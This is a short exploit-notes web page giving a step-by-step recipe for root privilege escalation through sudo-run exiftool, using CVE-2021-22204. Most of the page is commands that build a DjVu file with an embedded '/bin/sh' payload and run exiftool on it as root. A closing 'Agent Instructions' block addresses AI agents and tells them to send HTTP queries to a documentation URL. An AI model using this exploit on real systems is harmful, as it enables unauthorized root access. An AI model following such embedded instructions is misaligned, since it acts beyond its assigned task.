# Sudo Exiftool Privilege Escalation

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-exiftool-privilege-escalation/#investigation) <a href="#investigation" id="investigation"></a>

```sh
(root) NOPASSWD: /usr/local/bin/exiftool
Copied!
```

If we can execute **"exiftool"** command as root, we can gain access to privileges.

<br>

### [Arbitrary Code Execution (CVE-2021-22204) version 7.44+](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-exiftool-privilege-escalation/#arbitrary-code-execution-\(cve-2021-22204\)-version-7.44%2B) <a href="#arbitrary-code-execution-cve-2021-22204-version-7.44-2b" id="arbitrary-code-execution-cve-2021-22204-version-7.44-2b"></a>

Reference: <https://vk9-sec.com/exiftool-12-23-arbitrary-code-execution-privilege-escalation-cve-2021-22204/>

Check the exiftool version.\
If the exiftool version is later than **7.44**, we can execute arbitrary code.

```bash
exiftool -ver
Copied!
```

#### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-exiftool-privilege-escalation/#exploitation) <a href="#exploitation" id="exploitation"></a>

In local machine, create the payload in a file named **“exploit”**.

```bash
(metadata "\c${system('/bin/sh')};")
Copied!
```

Next, compress the file.

```bash
bzz exploit exploit.bzz
Copied!
```

Then create the DjVu file using the compressed file.

```bash
sudo apt install -y djvulibre-bin
# INFO: Create the initial information chunk.
# BGjp: Create a JPEG background chunk.
# ANTz: Write the compressed annotation chunk with the input file.
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=exploit.bzz
Copied!
```

Now we have **“exploit.djvu”** file.\
Trasfer the file to the target machine and run exiftool as root given the DjVufile.

```bash
sudo /usr/local/bin/exiftool exploit.djvu
Copied!
```

We should get a root shell.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-exiftool-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.